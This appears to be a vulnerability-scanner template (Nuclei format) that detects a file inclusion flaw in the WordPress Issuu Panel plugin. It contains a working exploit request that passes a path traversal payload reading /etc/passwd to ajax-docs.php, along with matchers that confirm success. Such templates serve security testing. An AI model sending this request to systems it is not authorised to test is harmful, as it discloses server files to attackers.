id: issuu-panel-lfi

info:
  name: Wordpress Plugin Issuu Panel - RFI & LFI
  author: 0x_Akoko
  severity: high
  description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
  reference: https://cxsecurity.com/issue/WLB-2016030131
  tags: wp-plugin,wordpress,lfi,rfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
